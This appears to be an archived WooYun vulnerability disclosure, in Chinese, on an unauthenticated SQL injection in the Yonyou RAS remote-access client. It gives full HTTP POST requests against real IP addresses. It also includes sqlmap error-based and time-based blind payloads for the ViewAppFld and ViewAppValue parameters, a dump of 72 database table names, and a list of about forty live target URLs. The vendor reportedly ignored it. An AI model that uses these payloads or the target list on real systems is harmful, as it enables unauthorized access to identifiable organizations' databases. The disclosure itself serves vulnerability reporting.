乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-03: 细节已通知厂商并且等待厂商处理中 2015-06-08: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2015-08-02: 细节向核心白帽子及相关领域专家公开 2015-08-12: 细节向普通白帽子公开 2015-08-22: 细节向实习白帽子公开 2015-09-06: 细节向公众公开
附40多个案例啊。。
用友软件RAS标准版客户端(远程快速应用接入)无需登录存在SQL注入。第一处:
POST /server/cmxpagedquery.php?pgid=AppList&SearchFlag=true HTTP/1.1Content-Length: 136Content-Type: application/x-www-form-urlencodedReferer: http://116.236.131.194:8080/Cookie: PHPSESSID=jb7b826hb3p30jf2rdt17mr8n0; RAS_Client_Style=1; g_LanguageID=cn; RAS_Admin_UserInfo_Domain=aa-ecf4369da2f8; temp_DisplayName=tmtgrnvr; temp_Description=%E5%85%81%E8%AE%B8%E7%94%A8%E6%88%B7%E8%BF%9C%E7%A8%8B%E8%AE%BF%E9%97%AE%E6%AD%A4%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%8A%E7%9A%84%E6%96%87%E4%BB%B6%E5%A4%B9; ErrorInfo=%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E4%BF%A1%E6%81%AF%3A+Parameter+3%3A+%E7%B1%BB%E5%9E%8B%E4%B8%8D%E5%8C%B9%E9%85%8D%E3%80%82%0D%0A+++%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E6%96%87%E4%BB%B6%3A+C%3A%5CProgram+Files%5CComexe%5CRasMini%5Crasweb%5CApache2%5Chtdocs%5Csmarty-2.6.19%5CServer%5CCmxUserGroup.php+%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E8%A1%8C%E5%8F%B7%3A+386+%E8%A1%8C%3Cbr+%2F%3EHost: 116.236.131.194:8080Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: --user-agent "Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0"Accept: */*AppID%5b-1%5d=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=8&ViewAppValue=1
参数ViewAppFld和ViewAppValue都存在注入。。第二处:
POST /server/cmxfolder.php?pgid=AppList&SearchFlag=true&t=1433251155 HTTP/1.1Content-Length: 118Content-Type: application/x-www-form-urlencodedReferer: http://218.31.33.44:8888/Cookie: PHPSESSID=jb7b826hb3p30jf2rdt17mr8n0; RAS_Client_Style=1; g_LanguageID=cn; RAS_Admin_UserInfo_Domain=aa-ecf4369da2f8; temp_DisplayName=tmtgrnvr; temp_Description=%E5%85%81%E8%AE%B8%E7%94%A8%E6%88%B7%E8%BF%9C%E7%A8%8B%E8%AE%BF%E9%97%AE%E6%AD%A4%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%8A%E7%9A%84%E6%96%87%E4%BB%B6%E5%A4%B9; ErrorInfo=%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E4%BF%A1%E6%81%AF%3A+Parameter+3%3A+%E7%B1%BB%E5%9E%8B%E4%B8%8D%E5%8C%B9%E9%85%8D%E3%80%82%0D%0A+++%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E6%96%87%E4%BB%B6%3A+C%3A%5CProgram+Files%5CComexe%5CRasMini%5Crasweb%5CApache2%5Chtdocs%5Csmarty-2.6.19%5CServer%5CCmxUserGroup.php+%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E8%A1%8C%E5%8F%B7%3A+386+%E8%A1%8C%3Cbr+%2F%3EHost: 218.31.33.44:8888Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=1ViewAppValue=1
参数ViewAppFld和ViewAppValue都存在注入。。
---Parameter: ViewAppFld (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: AppID[-1]=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=8) AND (SELECT 4416 FROM(SELECT COUNT(*),CONCAT(0x716a787871,(SELECT (ELT(4416=4416,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (6748=6748&ViewAppValue=1 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: AppID[-1]=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=8) AND (SELECT * FROM (SELECT(SLEEP(30)))porO) AND (5447=5447&ViewAppValue=1---web server operating system: Windowsweb application technology: PHP 5.2.6, Apache 2.2.9back-end DBMS: MySQL >= 5.0.0current database: 'rasdatabase'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: ViewAppFld (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: AppID[-1]=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=8) AND (SELECT 4416 FROM(SELECT COUNT(*),CONCAT(0x716a787871,(SELECT (ELT(4416=4416,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (6748=6748&ViewAppValue=1 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: AppID[-1]=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=8) AND (SELECT * FROM (SELECT(SLEEP(30)))porO) AND (5447=5447&ViewAppValue=1---web server operating system: Windowsweb application technology: PHP 5.2.6, Apache 2.2.9back-end DBMS: MySQL >= 5.0.0Database: rasdatabase[72 tables]+---------------------------+| hbadminrolegroupmembers || hbadminrolerestrictedorgs || hbadminroletask || hbadminroleusermembers || hbclientgroupapplication || hbclientgroupprinter || hbdirectoryapplication || hborgapplication || hborglicensepolicy || hborgpolicy || hbpolicyvalues || hbroletask || hbserverapplication || hbserverprinterdriver || hbserverprintinf || hbserverrole || hbservertask || hbtaskaction || hbtaskcondition || hbuserapplication || hbuserdirectory || hbuserorgs || hbuserpolicy || lograsarchi || lograsconcurrenta || lograsconcurrentus || lograsent || lograssessi || lograstaskactionhist || lograstaskhist || oemuserinfo || rasactions || rasadminroles || rasadmintasks || rasapplication || rasbadprinterdriver || rascfg || rasclient || rasclientgroup || rascompatibilitydriver || rasconcurrentsession || rasconditions || rasconnectionsetting || rasdatabase || rasdirectory || rasdmzserverd || rasdomain || rasgroupuser || rasinfocollectordata || rasjobs || rasjobsteps || raslicenseinfo || raslicensetoken || raslicpolicy || raslockdownpolicies || rasmonthlyminute || rasorgs || rasprinter || rasprinterdriver || rasproductk || rasreqids || rasroles || rasrunningservers || rasselection || rasserver || rasstyle || rastasks || rasticketing || rastimedsessio || rasuser || rasusermng || usermachines |+---------------------------+http://116.236.131.194:8080/http://221.239.106.90:81/http://61.161.199.197/http://180.168.5.162:8080/http://111.30.26.38:8000/http://115.231.212.82:8080/http://58.246.235.50/http://218.31.33.158:8001/http://60.10.34.57:8888/http://218.207.195.169:8888/http://122.224.243.218:8888/http://124.172.246.131:81/http://120.35.19.21:81/http://222.69.38.12:8080/http://61.161.182.38:8080/http://125.93.255.209:8000/http://223.197.196.73:81/http://58.221.244.10:8080/http://112.84.176.254:8000/http://61.164.84.70:8080/http://116.228.5.26:8080/http://218.76.48.74:81/http://140.207.74.170:81/http://121.29.222.68:8080/http://59.53.170.89:81/http://218.31.33.44:8888/http://60.190.102.141:8080/http://60.12.220.103:8000/http://122.227.192.250:8080/http://59.37.7.110:8001/http://222.223.228.247:81/http://222.69.91.134:81/http://116.228.113.155/http://121.33.210.52:8080/http://116.90.82.78:8000/http://221.129.245.61:8080/http://120.71.225.49:8000/http://110.87.98.18:81/http://60.29.103.158:8000/http://120.193.185.187:81/http://58.20.34.149:8080/http://222.223.228.249:81/http://210.22.101.234:8080/
过滤
危害等级:无影响厂商忽略
忽略时间:2015-09-06 16:59
漏洞Rank:15 (WooYun评价)
暂无